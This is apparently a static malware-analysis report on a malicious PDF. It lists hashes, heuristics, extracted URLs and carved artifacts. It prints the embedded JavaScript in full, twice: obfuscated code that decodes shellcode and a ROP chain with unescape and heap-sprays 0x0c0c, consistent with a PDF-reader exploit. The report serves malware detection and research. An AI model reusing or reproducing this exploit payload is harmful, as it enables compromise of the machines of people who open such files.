Malicious PDF — malware analysis report

Static analysis result for SHA-256 506f754f0e44c944…

MALICIOUS

PDF

53.5 KB First seen: 2026-05-11
MD5: bc2679b80755d42d848c67700286f2e9 SHA-1: 15b74ad0ae0bf0662beac051ebb8865ec6a4d934 SHA-256: 506f754f0e44c94444db4c4f23974eb9004718d54c1e5e36fd239c02b458e6be
76 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 5

  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • XFA form low PDF_XFA
    PDF uses XML Forms Architecture — can contain script logic
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.bitstream.com In PDF document text
    • http://ns.adobe.com/xdp/Referenced by PDF JavaScript
    • http://www.xfa.org/schema/xci/2.6/Referenced by PDF JavaScript
    • http://www.xfa.org/schema/xfa-template/2.6/Referenced by PDF JavaScript

Related samples 8

Ranked by shared artifacts, heuristics, extracted URLs, CVEs, and signatures.

Full JSON: related samples API

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0012_000.js pdf-javascript-stream PDF /JS object 12 at offset 0xC3C2 3748 bytes
SHA-256: 462d8551fc9c50b30883be88c0a5f552505dea38483602f2a002dad19b7fcf61
Detection
ClamAV: No threats found
Obfuscation or payload: likely
8 of 12 identifiers look randomly generated (e.g. 'nteccopEHRwqeWwAEZJIOUybaHUAFxUoFyKssUOb') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
var OegXFBMYDbNrRVilQvGrMWdMgHQyRaccgHvNHrmkFiiiwRIEXvXCyCIRSCbpNZqSCw = unescape;
var nteccopEHRwqeWwAEZJIOUybaHUAFxUoFyKssUObatNdZvOxEZajhAjZGISRqpnvLNQlgEKrPxtbbBJuEvn = OegXFBMYDbNrRVilQvGrMWdMgHQyRaccgHvNHrmkFiiiwRIEXvXCyCIRSCbpNZqSCw( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%uc92b%ud7db%u74d9%uf424%u49b1%ube58%u359a%ub1ab%u7031%u0317%u1770%ue883%u78fc%u57c0%uf559%ua82b%u659a%u4da5%ub7ab%u06d1%u079e%u4b91%uec13%u7ff7%u80a0%u70df%u2e01%ube06%u9f92%u6c86%ube50%u6f7a%u6085%ua042%u61d8%udd83%u3313%ua95c%ua386%uefe9%uc21a%u643d%ubc22%ubb38%u76d7%uec42%u0d48%u140c%u49e2%u25ad%u8a27%u6c91%u784c%u6f61%ub184%u418a%u1de8%u6db5%u5ce5%u4af1%u2b16%ua909%u2bab%ud3ca%ube77%u74cf%u18f3%u8434%ufed0%u8abf%u759d%u8ee7%u5a20%uab93%u5da9%u3a74%u79e9%u6650%ue0a9%uc2c1%u1d1c%uaa11%ubbc1%u5959%ubd15%u3603%uf3da%uc6bb%u8474%uf4c8%u3edb%ub547%u9894%uba90%u5c8e%u450e%u9c31%u8206%ucc65%u2330%u8706%uccc0%u07d3%u6291%ue78c%uc341%u8f7c%ucc8b%uafa3%u06b3%u45cc%uc149%u98f9%u2350%u9896%u5252%u153a%u3eb4%u73d2%ud76e%ude4b%u46e4%uf593%u4980%uf91f%u0775%u74e8%uf066%uc318%u57d4%ufe26%u5873%u04b2%u0fd2%u062a%u6703%uf9f5%uf366%u6f3c%u6cc9%u7f41%u6cc9%u1517%u04c9%u4dcf%u319a%u5810%ue98e%u6285%u5ee7%u0a0d%ub805%u9579%ueff6%uea7b%ud620%u1af9%u3a47%u41c2' );
var nrHSPMWFuvKnhzoGOjjTSMTkBJnOXmJNqVeOOR = OegXFBMYDbNrRVilQvGrMWdMgHQyRaccgHvNHrmkFiiiwRIEXvXCyCIRSCbpNZqSCw( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
while (nrHSPMWFuvKnhzoGOjjTSMTkBJnOXmJNqVeOOR.length + 20 + 8 < 65536) nrHSPMWFuvKnhzoGOjjTSMTkBJnOXmJNqVeOOR+=nrHSPMWFuvKnhzoGOjjTSMTkBJnOXmJNqVeOOR;
emfjJDGesJqLyNpzlBuqNjeIGtWTUAtutUXvDrpqdXEYmaiKxtL = nrHSPMWFuvKnhzoGOjjTSMTkBJnOXmJNqVeOOR.substring(0, (0x0c0c-0x24)/2);
emfjJDGesJqLyNpzlBuqNjeIGtWTUAtutUXvDrpqdXEYmaiKxtL += nteccopEHRwqeWwAEZJIOUybaHUAFxUoFyKssUObatNdZvOxEZajhAjZGISRqpnvLNQlgEKrPxtbbBJuEvn;
emfjJDGesJqLyNpzlBuqNjeIGtWTUAtutUXvDrpqdXEYmaiKxtL += nrHSPMWFuvKnhzoGOjjTSMTkBJnOXmJNqVeOOR;
nvDVZgXIemQHcIjgCaYXXoCypYsBAnIkeHQTXptcAnygyYVvWCMJbVJAabrFwMW = emfjJDGesJqLyNpzlBuqNjeIGtWTUAtutUXvDrpqdXEYmaiKxtL.substring(0, 65536/2);
while(nvDVZgXIemQHcIjgCaYXXoCypYsBAnIkeHQTXptcAnygyYVvWCMJbVJAabrFwMW.length < 0x80000) nvDVZgXIemQHcIjgCaYXXoCypYsBAnIkeHQTXptcAnygyYVvWCMJbVJAabrFwMW += nvDVZgXIemQHcIjgCaYXXoCypYsBAnIkeHQTXptcAnygyYVvWCMJbVJAabrFwMW;
ZgaFfHPHgQfdzEpOINuCaiKalmrwsKGdUcWMJBApRURwihjLRKLmUjxlMb = nvDVZgXIemQHcIjgCaYXXoCypYsBAnIkeHQTXptcAnygyYVvWCMJbVJAabrFwMW.substring(0, 0x80000 - (0x1020-0x08) / 2);
var iYbOFeTEaVlqFJDPgxbwweUklxmPPqwpSgGTuIbbPXRmnPpatG = new Array();
for (ZMHhhGFaFAHpeGOwauyEHcdveEbUEpj=0;ZMHhhGFaFAHpeGOwauyEHcdveEbUEpj<0x1f0;ZMHhhGFaFAHpeGOwauyEHcdveEbUEpj++) iYbOFeTEaVlqFJDPgxbwweUklxmPPqwpSgGTuIbbPXRmnPpatG[ZMHhhGFaFAHpeGOwauyEHcdveEbUEpj]=ZgaFfHPHgQfdzEpOINuCaiKalmrwsKGdUcWMJBApRURwihjLRKLmUjxlMb+"s";
javascript_obj0012_001.js pdf-javascript-stream PDF /JS object 12 at offset 0xC3E4 4634 bytes
SHA-256: 807083655ef966f54c51bd2f687d8342c637bde98d4b2f8d55682079c42ff2bf
Preview script
First 1,000 lines of the extracted script
var OegXFBMYDbNrRVilQvGrMWdMgHQyRaccgHvNHrmkFiiiwRIEXvXCyCIRSCbpNZqSCw = unescape;
var nteccopEHRwqeWwAEZJIOUybaHUAFxUoFyKssUObatNdZvOxEZajhAjZGISRqpnvLNQlgEKrPxtbbBJuEvn = OegXFBMYDbNrRVilQvGrMWdMgHQyRaccgHvNHrmkFiiiwRIEXvXCyCIRSCbpNZqSCw( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%uc92b%ud7db%u74d9%uf424%u49b1%ube58%u359a%ub1ab%u7031%u0317%u1770%ue883%u78fc%u57c0%uf559%ua82b%u659a%u4da5%ub7ab%u06d1%u079e%u4b91%uec13%u7ff7%u80a0%u70df%u2e01%ube06%u9f92%u6c86%ube50%u6f7a%u6085%ua042%u61d8%udd83%u3313%ua95c%ua386%uefe9%uc21a%u643d%ubc22%ubb38%u76d7%uec42%u0d48%u140c%u49e2%u25ad%u8a27%u6c91%u784c%u6f61%ub184%u418a%u1de8%u6db5%u5ce5%u4af1%u2b16%ua909%u2bab%ud3ca%ube77%u74cf%u18f3%u8434%ufed0%u8abf%u759d%u8ee7%u5a20%uab93%u5da9%u3a74%u79e9%u6650%ue0a9%uc2c1%u1d1c%uaa11%ubbc1%u5959%ubd15%u3603%uf3da%uc6bb%u8474%uf4c8%u3edb%ub547%u9894%uba90%u5c8e%u450e%u9c31%u8206%ucc65%u2330%u8706%uccc0%u07d3%u6291%ue78c%uc341%u8f7c%ucc8b%uafa3%u06b3%u45cc%uc149%u98f9%u2350%u9896%u5252%u153a%u3eb4%u73d2%ud76e%ude4b%u46e4%uf593%u4980%uf91f%u0775%u74e8%uf066%uc318%u57d4%ufe26%u5873%u04b2%u0fd2%u062a%u6703%uf9f5%uf366%u6f3c%u6cc9%u7f41%u6cc9%u1517%u04c9%u4dcf%u319a%u5810%ue98e%u6285%u5ee7%u0a0d%ub805%u9579%ueff6%uea7b%ud620%u1af9%u3a47%u41c2' );
var nrHSPMWFuvKnhzoGOjjTSMTkBJnOXmJNqVeOOR = OegXFBMYDbNrRVilQvGrMWdMgHQyRaccgHvNHrmkFiiiwRIEXvXCyCIRSCbpNZqSCw( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
while (nrHSPMWFuvKnhzoGOjjTSMTkBJnOXmJNqVeOOR.length + 20 + 8 < 65536) nrHSPMWFuvKnhzoGOjjTSMTkBJnOXmJNqVeOOR+=nrHSPMWFuvKnhzoGOjjTSMTkBJnOXmJNqVeOOR;
emfjJDGesJqLyNpzlBuqNjeIGtWTUAtutUXvDrpqdXEYmaiKxtL = nrHSPMWFuvKnhzoGOjjTSMTkBJnOXmJNqVeOOR.substring(0, (0x0c0c-0x24)/2);
emfjJDGesJqLyNpzlBuqNjeIGtWTUAtutUXvDrpqdXEYmaiKxtL += nteccopEHRwqeWwAEZJIOUybaHUAFxUoFyKssUObatNdZvOxEZajhAjZGISRqpnvLNQlgEKrPxtbbBJuEvn;
emfjJDGesJqLyNpzlBuqNjeIGtWTUAtutUXvDrpqdXEYmaiKxtL += nrHSPMWFuvKnhzoGOjjTSMTkBJnOXmJNqVeOOR;
nvDVZgXIemQHcIjgCaYXXoCypYsBAnIkeHQTXptcAnygyYVvWCMJbVJAabrFwMW = emfjJDGesJqLyNpzlBuqNjeIGtWTUAtutUXvDrpqdXEYmaiKxtL.substring(0, 65536/2);
while(nvDVZgXIemQHcIjgCaYXXoCypYsBAnIkeHQTXptcAnygyYVvWCMJbVJAabrFwMW.length < 0x80000) nvDVZgXIemQHcIjgCaYXXoCypYsBAnIkeHQTXptcAnygyYVvWCMJbVJAabrFwMW += nvDVZgXIemQHcIjgCaYXXoCypYsBAnIkeHQTXptcAnygyYVvWCMJbVJAabrFwMW;
ZgaFfHPHgQfdzEpOINuCaiKalmrwsKGdUcWMJBApRURwihjLRKLmUjxlMb = nvDVZgXIemQHcIjgCaYXXoCypYsBAnIkeHQTXptcAnygyYVvWCMJbVJAabrFwMW.substring(0, 0x80000 - (0x1020-0x08) / 2);
var iYbOFeTEaVlqFJDPgxbwweUklxmPPqwpSgGTuIbbPXRmnPpatG = new Array();
for (ZMHhhGFaFAHpeGOwauyEHcdveEbUEpj=0;ZMHhhGFaFAHpeGOwauyEHcdveEbUEpj<0x1f0;ZMHhhGFaFAHpeGOwauyEHcdveEbUEpj++) iYbOFeTEaVlqFJDPgxbwweUklxmPPqwpSgGTuIbbPXRmnPpatG[ZMHhhGFaFAHpeGOwauyEHcdveEbUEpj]=ZgaFfHPHgQfdzEpOINuCaiKalmrwsKGdUcWMJBApRURwihjLRKLmUjxlMb+"s";

endstream
endobj
13 0 obj 
<</XFA 14 0 R>>
endobj
14 0 obj 
<</Length 435>>
stream
<?xml version="1.0" encoding="UTF-8"?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
  <config xmlns="http://www.xfa.org/schema/xci/2.6/">
    <present>
      <pdf>
        <interactive>1</interactive>
      </pdf>
    </present>
  </config>
  <template xmlns="http://www.xfa.org/schema/xfa-template/2.6/">
    <subform name="form1" layout="tb" locale="en_US">
      <pageSet>
      </pageSet>
    </subform>
  </template>
</xdp:xdp>

endstream
endobj
xref
0 15
0000000000 65535 f
0000000015 00000 n
0000000101 00000 n
0000000192 00000 n
0000000222 00000 n
0000000256 00000 n
0000000355 00000 n
0000000387 00000 n
0000000527 00000 n
0000000649 00000 n
0000000766 00000 n
0000050057 00000 n
0000050114 00000 n
0000053914 00000 n
0000053947 00000 n
trailer
<</Size 15/Root 1 0 R>>
startxref
54433
%%EOF
font_00_sfnt_off0000032f.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x32F 49224 bytes
SHA-256: 46b2eb7079bdedda12c79edf642758aa4835b9e9541a5ac2b8347cc9b9bf6e38
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x0C

Open this report in the interactive analyzer, or submit your own file for analysis.